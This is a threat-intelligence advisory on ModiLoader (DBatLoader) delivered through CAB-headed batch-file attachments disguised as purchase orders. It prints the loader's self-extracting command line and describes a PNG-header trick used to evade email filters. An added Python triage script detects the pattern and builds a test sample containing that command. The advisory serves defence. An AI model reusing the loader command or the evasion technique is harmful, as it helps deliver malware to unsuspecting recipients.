Warning Against ModiLoader (DBatLoader) Spreading via MS Windows CAB Header Batch File (*.cmd)

In December 2024, AhnLab SEcurity intelligence Center (ASEC) identified, through AhnLab's email honeypot, the distribution of malware using a batch file (*.cmd) that carries an MS Windows CAB header.


The malware, known as ModiLoader (DBatLoader), was being distributed in emails disguised as purchase orders (PO).

What distinguishes this case from earlier ones is that, although the file carries the *.cmd (batch file) extension, it abuses the CAB archive header format so that the batch file acts as a loader which creates and executes the embedded malware.

Binary Structure: CAB header (MSCF) + Command line + PE (exe)
Extension: *.cmd


This technique has also been reported internationally, in a post titled Threat Actor Turns a CAB File Into the Loader to Deploy ModiLoader.

Figure 1. An email distributing ModiLoader (DBatLoader)


The threat actor altered the header of the attached file to bypass email security products. The identified attachment is a CAB archive with the MSCF magic header, but a PNG (image file) header appears to have been prepended, presumably to bypass file filtering or automatic inspection of the files inside the archive.

Figure 2. The header of the compressed file attached to the email


Inside the compressed file are a benign image file and a malicious batch file (*.cmd) that uses the MS Windows CAB format.

Figure 3. The list of files within the compressed file attachment


The CMD batch file has the unusual structure shown below: a CAB structure, command instructions, and an executable file. The command instructions are what allow it to function as a loader.

Figure 4. CAB-type loader executing ModiLoader (DBatLoader) (File name: PO_SK336.cmd)

For the CAB structure to be extractable with extrac32, the size of each block must be set correctly, starting from the coffCabStart offset. cCFData indicates the number of CFDATA blocks, but it can be set to an arbitrary value without affecting functionality.


The execution process of the distributed PO_SK336.cmd file is as follows:

1) Executes the command line, ignoring the CAB header at the front of the file
2) Decompresses itself (the CAB structure) via extrac32
3) Creates the embedded executable file (EXE) in the %temp% folder and runs it


The command line instructions are as follows:

cls && extrac32 /y "%~f0" "%tmp%\x.exe" && start "" "%tmp%\x.exe"
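A defender-side triage check for this layout, added here as an example and not part of ASEC's analysis: it reads the CFHEADER and CFFOLDER fields mentioned above (coffCabStart, cCFData) using the Microsoft Cabinet format layout, reports any bytes prepended before the MSCF signature (the PNG trick seen on the attachment), and looks for the extrac32 "%~f0" self-extraction command and an MZ marker after coffCabStart. The sample input is constructed for the example and is deliberately not an extractable CAB.

```python
import re
import struct
CFHEADER_FMT = "<4sIIIIIBBHHHHH"  # 36-byte CFHEADER of the MS Cabinet format
CFFOLDER_FMT = "<IHH"             # CFFOLDER: coffCabStart, cCFData, typeCompress
CFHDR_RESERVE_PRESENT = 0x0004
# The self-extraction the loader depends on: extrac32 reading the script itself (%~f0)
SELF_EXTRACT_RE = re.compile(rb"extrac32\s+[^\r\n]*%~f0", re.IGNORECASE)


def triage_cab_batch(data):
    """Report CAB-loader indicators in raw file bytes; 'cab_header' is False
    when no MSCF signature appears anywhere in the data."""
    base = data.find(b"MSCF")
    if base < 0:
        return {"cab_header": False}
    try:
        flags = struct.unpack_from(CFHEADER_FMT, data, base)[10]
        folder_off = base + 36
        if flags & CFHDR_RESERVE_PRESENT:  # optional reserve area precedes CFFOLDER
            folder_off += 4 + struct.unpack_from("<H", data, folder_off)[0]
        coff_cab_start, c_cfdata, _ = struct.unpack_from(CFFOLDER_FMT, data, folder_off)
    except struct.error:
        return {"cab_header": True, "prefix_bytes": base, "truncated": True}
    cmd = SELF_EXTRACT_RE.search(data)
    pe_off = data.find(b"MZ", base + coff_cab_start)
    return {
        "cab_header": True,
        "prefix_bytes": base,  # > 0: bytes such as a PNG signature precede MSCF
        "cab_start_in_file": base + coff_cab_start < len(data),
        "c_cfdata": c_cfdata,  # may be set arbitrarily by the loader, so only reported
        "self_extract_cmd": cmd.group(0).decode("ascii", "replace") if cmd else None,
        "embedded_pe_offset": pe_off if pe_off >= 0 else None,
    }


def is_cab_loader(report):
    """MSCF header + extrac32 self-extraction + MZ after coffCabStart = loader pattern."""
    return bool(report["cab_header"] and report.get("self_extract_cmd")
                and report.get("embedded_pe_offset") is not None)


def build_sample():
    """Constructed test input (not a real sample, not an extractable CAB: no CFFILE or
    CFDATA records): PNG signature + CFHEADER + CFFOLDER + command line + PE stub."""
    cmd = b'cls && extrac32 /y "%~f0" "%tmp%\\x.exe" && start "" "%tmp%\\x.exe"\r\n'
    coff_cab_start = 36 + 8 + len(cmd)  # first CFDATA placed right after the command
    header = struct.pack(CFHEADER_FMT, b"MSCF", 0, coff_cab_start + 18, 0, 44, 0,
                         3, 1, 1, 1, 0, 0, 0)
    folder = struct.pack(CFFOLDER_FMT, coff_cab_start, 1, 0)
    return b"\x89PNG\r\n\x1a\n" + header + folder + cmd + b"MZ" + b"\x00" * 16
```

Running triage_cab_batch over the bytes of a suspicious .cmd attachment and feeding the result to is_cab_loader flags files that match all three indicators; the prefix_bytes field separately exposes a prepended image header on the outer archive.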


Final Malware Creation Path

Figure 5. The creation path (%temp%) of ModiLoader (DBatLoader)

Users should be particularly cautious regarding attached files.

MD5

c4a6a2895bdbfab657a516abf9ce7780
c6fc475a21d8114788d4d0ac4299c317

Gain access to related IOCs and detailed analysis by subscribing to AhnLab TIP.